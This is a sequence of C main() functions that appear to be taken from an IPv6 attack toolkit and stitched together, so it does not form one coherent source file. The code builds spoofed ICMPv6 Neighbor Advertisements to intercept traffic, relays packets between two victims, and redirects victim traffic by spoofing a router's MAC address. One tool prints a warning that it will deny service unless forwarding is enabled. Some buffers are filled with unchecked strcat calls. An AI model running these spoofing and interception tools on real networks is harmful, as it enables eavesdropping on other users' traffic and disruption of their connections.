int createRepeater(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac) { ownMac = resolveMAC(mArgs.ownMac); if (DEBUG) thc_dump_data(ownMac, 6, "Own mac:"); nodeAIp = thc_resolve6(nodAIp); nodeAMac = resolveMAC(nodAMac); nodeBIp = thc_resolve6(nodBIp); nodeBMac = resolveMAC(nodBMac); int pid = 0; char filter[256] = "ip6 and ( ( src "; strcat(filter, nodAIp); strcat(filter, " and dst "); strcat(filter, nodBIp); strcat(filter, " ) or ( src "); strcat(filter, nodBIp); strcat(filter, " and dst "); strcat(filter, nodAIp); strcat(filter, " ) )"); if (DEBUG) printf("Filter : %s \n", filter); if ((pid = fork()) == 0) { thc_pcap_function(mArgs.interface, filter, (char *) repeater, 1, NULL); exit(0); } return pid; }
int main(int argc, char *argv[]) { int i; char *glob; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) { switch (i) { case 'm': maxhop = atoi(optarg); break; case 'D': do_dst = 1; break; case 's': noverb = 1; break; case 'R': if ((ll = index(optarg, '/')) != NULL) *ll = 0; replace = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1 || argc - optind > 2) help(argv[0]); interface = argv[optind]; if (argc == optind + 2) script = argv[optind + 1]; memset(d, 0, sizeof(d)); _thc_ipv6_showerrors = 0; // we dont want our own address in the discovered addresses glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL); ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK); memcpy(hostpart, ll + 8, 8); if (memcmp(ll + 8, glob + 8, 8) != 0) { // do we have a global address with a different host part? memcpy(d[0], glob, 16); dcnt = 1; } if (do_dst < 255 && do_dst) fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n"); if (noverb == 0) printf("Started IPv6 passive system detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL); return 0; // never reached }
int main(int argc, char *argv[]) { if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (argc > 2) script = argv[2]; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("Started ICMP6 DAD detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); }
int main(int argc, char *argv[]) { if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (argc > 2) { script = argv[2]; if ((es = malloc(20 + strlen(script))) == NULL) { fprintf(stderr, "Error: malloc\n"); exit(-1); } } setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("Started ICMP6 DAD detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "ip6", (char *) intercept, NULL); }
int main(int argc, char *argv[]) { char dummy[24], mac[16] = "", buf2[6], buf3[1398]; unsigned char *ownmac = mac; int i, j; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); while ((i = getopt(argc, argv, "FHDRl")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': do_reverse = 1; break; case 'l': do_loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); interface = argv[optind]; if (argc - optind == 2 && argv[optind + 1] != NULL) sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else ownmac = thc_get_own_mac(interface); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); memset(buf2, 0, sizeof(buf2)); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); for (i = 0; i <= 0 + do_reverse; i++) { // printf("i: %d\n", i); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { ptype = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (ptype == NXT_ICMP6) ptype = NXT_FRAG; for (j = 0; j < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (ptype == NXT_ICMP6) ptype = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } // printf("i: %d, do_reverse: %d\n", i, do_reverse); if (i == 0 && do_reverse) { // printf("ipv62->ipv6 %p\n", ipv6); ipv62 = ipv6; ipv62->pkt[0] = 0x33; // multicast mac hack for destination ipv62->pkt[1] = 0x33; // multicast mac hack for destination ipv6 = NULL; pkt2 = pkt; pkt = NULL; pkt2_len = pkt_len; pkt_len = 0; ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only } } signal(SIGTERM, kill_children); signal(SIGSEGV, kill_children); signal(SIGHUP, kill_children); signal(SIGINT, kill_children); memset((char*)pp, 0, sizeof(pp)); printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n"); printf(" => echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n"); printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); }
int main(int argc, char *argv[]) { int rawmode = 0, offset = 14; char string[256] = "ip6"; if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; if ((src6 = thc_resolve6(argv[2])) == NULL) { if (strcmp(argv[2], "*") != 0) { fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]); exit(-1); } } if ((dest6 = thc_resolve6(argv[3])) == NULL) { if (strcmp(argv[3], "*") != 0) { fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]); exit(-1); } } if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) { fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]); exit(-1); } if (argc >= 6) { if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]); exit(-1); } } else newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } mac6 = mac; if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); realownmac = thc_get_own_mac(interface); if (src6 != NULL) { strcat(string, " and src "); strcat(string, thc_ipv62notation(src6)); } if (dest6 != NULL) { strcat(string, " and dst "); strcat(string, thc_ipv62notation(dest6)); } printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n"); return thc_pcap_function(interface, string, (char *) intercept, 1, NULL); }
int main(int argc, char *argv[]) { char dummy[24], mac[6] = "", buf2[6], buf3[1398]; unsigned char *ownmac = mac; int i; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); while ((i = getopt(argc, argv, "FHDRl")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': do_reverse = 1; break; case 'l': do_loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); interface = argv[optind]; if (argc - optind == 2 && argv[optind + 1] != NULL) sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else ownmac = thc_get_own_mac(interface); memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); memset(buf2, 0, sizeof(buf2)); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); for (i = 0; i <= 0 + do_reverse; i++) { if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { ptype = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (ptype == NXT_ICMP6) ptype = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (ptype == NXT_ICMP6) ptype = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } if (i == 0 && do_reverse) { ipv62 = ipv6; ipv62->pkt[0] = 0x33; // multicast mac hack for destination ipv62->pkt[1] = 0x33; // multicast mac hack for destination ipv6 = NULL; pkt2 = pkt; pkt = NULL; pkt2_len = pkt_len; pkt_len = 0; } } printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n"); printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "ip6", (char *) intercept, NULL); }
int main(int argc, char *argv[]) { char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c }; time_t passed = 0; pcap_t *p; thc_ipv6_hdr hdr; int sndbuflen = 0, i; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "adp")) >= 0) { switch(i) { case 'a': active = 1; break; case 'd': debug = 1; break; case 'p': passive = 1; break; default: fprintf(stderr, "Error: invalid option -%c\n", i); exit(-1); } } if (getenv("THC_IPV6_PPPOE") != NULL) type = 1; else if (getenv("THC_IPV6_6IN4") != NULL) type = 2; if (type == 0) { fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n"); exit(-1); } if (type == 2 && active) fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n"); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]); if (active == 1 && type == 1) { if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) { fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } memcpy(sndbuf, do_hdr, do_hdr_size); sndbuf[18 + do_hdr_off] = 0x00; sndbuf[19 + do_hdr_off] = sizeof(data) + 2; sndbuf[20 + do_hdr_off] = 0xc0; sndbuf[21 + do_hdr_off] = 0x21; memcpy(sndbuf + do_hdr_size, data, sizeof(data)); sndbuflen = do_hdr_size + sizeof(data); hdr.pkt = sndbuf; hdr.pkt_len = sndbuflen; while (1) { thc_pcap_check(p, (char *) intercept, NULL); usleep(100); if (passed <= time(NULL)) { if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) { fprintf(stderr, "Error: could not send packet to interface %s\n", interface); return -1; } passed = time(NULL) + 15; } } } else { thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL); fprintf(stderr, "Error: Could not set interface into promiscious mode\n"); exit(-1); } return -1; // never reached unless error }